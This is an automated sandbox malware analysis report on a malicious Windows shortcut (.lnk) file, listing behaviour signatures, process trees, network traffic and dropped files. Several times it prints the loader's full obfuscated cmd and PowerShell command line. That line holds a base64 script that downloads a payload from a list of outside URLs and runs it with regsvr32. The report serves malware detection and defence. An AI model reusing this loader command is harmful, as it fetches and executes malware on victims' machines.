Analysis Overview
SHA256
013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24
Threat Level: Likely malicious
The file 013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24 was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Checks computer location settings
Command and Scripting Interpreter: PowerShell
An obfuscated cmd.exe command-line is typically used to evade detection.
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 11:51
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 11:51
Reported
2024-11-13 11:53
Platform
win7-20240903-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1732 wrote to memory of 2712 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1732 wrote to memory of 2712 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1732 wrote to memory of 2712 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2712 wrote to memory of 2792 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2712 wrote to memory of 2792 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2712 wrote to memory of 2792 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24.lnk
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /v:on /c GTlZotS9zHLhEzCDMVbFWmYDHjUPPOgRtOUiWEAvvJDy26RCVDiWwI2MM1NVc/bUuTmj+3A7||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$Np='ICAgICAgICBXcml0ZS1Ib3N0ICJQZXhLZyI7JFByb2dyZXNzUH';$dx='JlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2JhdWRlc2lnbi5nZS9hc3NldHMvMUJBRUZtT1lxSWY3SExnLyIsImh0dHA6Ly9hZWdpc2NhcGNvcnAuY29tL3BsdWdpbnMtb2xkL1ljbDdLLyIsImh0dHA6Ly9iZW5yaWJ1eS5jb20vdGVzdC9QNS8iLCJodHRwczovL2FraWJhLXRyYXZlbC5jb20vc3RhdHMvTWNOQ1dmWklOUFdjYXlyeWlpLyIsImh0dHA6Ly9maXJlc3RhcnRlcnNwb3J0cy5jb20vYWRtaW4vUy8iLCJodHRwOi8vYXNzZW1ibHlsb2dpY2EubmwvZGV2L29oVTBKRy8iKTskdD0iSVJxUkIiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcaUtGc3FDQ3N6ay5IcFU7UmVnc3ZyMzIuZXhlICIkZFxpS0ZzcUNDc3prLkhwVSI7YnJlYWt9IGNhdGNoIHsgfX0=';$CwnbLX=[System.Convert]::FromBase64String($Np+$dx);$iZ=[System.Text.Encoding]::ASCII.GetString($CwnbLX); iex ($iZ)}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c "&{$Np='ICAgICAgICBXcml0ZS1Ib3N0ICJQZXhLZyI7JFByb2dyZXNzUH';$dx='JlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2JhdWRlc2lnbi5nZS9hc3NldHMvMUJBRUZtT1lxSWY3SExnLyIsImh0dHA6Ly9hZWdpc2NhcGNvcnAuY29tL3BsdWdpbnMtb2xkL1ljbDdLLyIsImh0dHA6Ly9iZW5yaWJ1eS5jb20vdGVzdC9QNS8iLCJodHRwczovL2FraWJhLXRyYXZlbC5jb20vc3RhdHMvTWNOQ1dmWklOUFdjYXlyeWlpLyIsImh0dHA6Ly9maXJlc3RhcnRlcnNwb3J0cy5jb20vYWRtaW4vUy8iLCJodHRwOi8vYXNzZW1ibHlsb2dpY2EubmwvZGV2L29oVTBKRy8iKTskdD0iSVJxUkIiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcaUtGc3FDQ3N6ay5IcFU7UmVnc3ZyMzIuZXhlICIkZFxpS0ZzcUNDc3prLkhwVSI7YnJlYWt9IGNhdGNoIHsgfX0=';$CwnbLX=[System.Convert]::FromBase64String($Np+$dx);$iZ=[System.Text.Encoding]::ASCII.GetString($CwnbLX); iex ($iZ)}"
Network
Files
memory/2792-40-0x000007FEF55BE000-0x000007FEF55BF000-memory.dmp
memory/2792-41-0x000000001B780000-0x000000001BA62000-memory.dmp
memory/2792-42-0x0000000001EF0000-0x0000000001EF8000-memory.dmp
memory/2792-43-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
memory/2792-44-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
memory/2792-45-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
memory/2792-46-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
memory/2792-48-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
memory/2792-47-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 11:51
Reported
2024-11-13 11:53
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2872 wrote to memory of 3868 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2872 wrote to memory of 3868 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 3868 wrote to memory of 5032 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3868 wrote to memory of 5032 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 5032 wrote to memory of 5108 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\regsvr32.exe |
| PID 5032 wrote to memory of 5108 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\regsvr32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24.lnk
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /v:on /c GTlZotS9zHLhEzCDMVbFWmYDHjUPPOgRtOUiWEAvvJDy26RCVDiWwI2MM1NVc/bUuTmj+3A7||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$Np='ICAgICAgICBXcml0ZS1Ib3N0ICJQZXhLZyI7JFByb2dyZXNzUH';$dx='JlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2JhdWRlc2lnbi5nZS9hc3NldHMvMUJBRUZtT1lxSWY3SExnLyIsImh0dHA6Ly9hZWdpc2NhcGNvcnAuY29tL3BsdWdpbnMtb2xkL1ljbDdLLyIsImh0dHA6Ly9iZW5yaWJ1eS5jb20vdGVzdC9QNS8iLCJodHRwczovL2FraWJhLXRyYXZlbC5jb20vc3RhdHMvTWNOQ1dmWklOUFdjYXlyeWlpLyIsImh0dHA6Ly9maXJlc3RhcnRlcnNwb3J0cy5jb20vYWRtaW4vUy8iLCJodHRwOi8vYXNzZW1ibHlsb2dpY2EubmwvZGV2L29oVTBKRy8iKTskdD0iSVJxUkIiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcaUtGc3FDQ3N6ay5IcFU7UmVnc3ZyMzIuZXhlICIkZFxpS0ZzcUNDc3prLkhwVSI7YnJlYWt9IGNhdGNoIHsgfX0=';$CwnbLX=[System.Convert]::FromBase64String($Np+$dx);$iZ=[System.Text.Encoding]::ASCII.GetString($CwnbLX); iex ($iZ)}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c "&{$Np='ICAgICAgICBXcml0ZS1Ib3N0ICJQZXhLZyI7JFByb2dyZXNzUH';$dx='JlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2JhdWRlc2lnbi5nZS9hc3NldHMvMUJBRUZtT1lxSWY3SExnLyIsImh0dHA6Ly9hZWdpc2NhcGNvcnAuY29tL3BsdWdpbnMtb2xkL1ljbDdLLyIsImh0dHA6Ly9iZW5yaWJ1eS5jb20vdGVzdC9QNS8iLCJodHRwczovL2FraWJhLXRyYXZlbC5jb20vc3RhdHMvTWNOQ1dmWklOUFdjYXlyeWlpLyIsImh0dHA6Ly9maXJlc3RhcnRlcnNwb3J0cy5jb20vYWRtaW4vUy8iLCJodHRwOi8vYXNzZW1ibHlsb2dpY2EubmwvZGV2L29oVTBKRy8iKTskdD0iSVJxUkIiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcaUtGc3FDQ3N6ay5IcFU7UmVnc3ZyMzIuZXhlICIkZFxpS0ZzcUNDc3prLkhwVSI7YnJlYWt9IGNhdGNoIHsgfX0=';$CwnbLX=[System.Convert]::FromBase64String($Np+$dx);$iZ=[System.Text.Encoding]::ASCII.GetString($CwnbLX); iex ($iZ)}"
C:\Windows\system32\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\..\IRqRB\iKFsqCCszk.HpU
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | baudesign.ge | udp |
| GE | 45.138.44.231:80 | baudesign.ge | tcp |
| GE | 45.138.44.231:443 | baudesign.ge | tcp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.44.138.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
memory/5032-0-0x00007FFF34EC3000-0x00007FFF34EC5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dbn0weny.32b.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5032-1-0x00000234B7A40000-0x00000234B7A62000-memory.dmp
memory/5032-11-0x00007FFF34EC0000-0x00007FFF35981000-memory.dmp
memory/5032-12-0x00007FFF34EC0000-0x00007FFF35981000-memory.dmp
C:\Users\Admin\AppData\Local\IRqRB\iKFsqCCszk.HpU
| MD5 | 66aa173a8aff58102540c8f7e4b3bd07 |
| SHA1 | 6731120f0a7523f530303ba6cbd18e016f740789 |
| SHA256 | 36c850f3cc750f3a0dcbb1fe6e8c278529e9ec59628893c5cbb1836508dbf329 |
| SHA512 | e810c657473e2dad9bb6c04714a37f6f7c34d4243b8006441841947efcff9c31b0511b80bed6f6211d1f23a2f4bf1b0984624c33911d31802eb37dd1771e6ff3 |
memory/5032-17-0x00007FFF34EC0000-0x00007FFF35981000-memory.dmp